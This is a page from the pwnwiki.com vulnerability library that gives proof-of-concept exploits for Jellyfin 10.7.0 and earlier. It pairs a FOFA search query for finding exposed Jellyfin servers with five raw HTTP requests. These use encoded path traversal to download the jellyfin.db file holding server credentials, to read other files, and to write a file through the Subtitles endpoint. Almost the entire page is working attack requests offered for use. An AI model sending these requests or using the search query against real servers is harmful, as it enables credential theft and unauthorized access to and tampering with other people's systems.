免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Versión afectada
jellyfin<=10.7.0
FOFA
title="Jellyfin"
POC1
Descarga jellyfin.db
con contraseña del servidor
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 Host: x.x.x.x accept: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Referer: http://x.x.x.x/web/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
POC2
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
POC3
GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
POC4
POC para descargar c:tempfilename.jpg
GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1 GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1
POC5
POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1 ... X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..." ... {"language":".\..\","format":".\..\test.bin","isForced":false,"data":"base64 encoded data"}
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库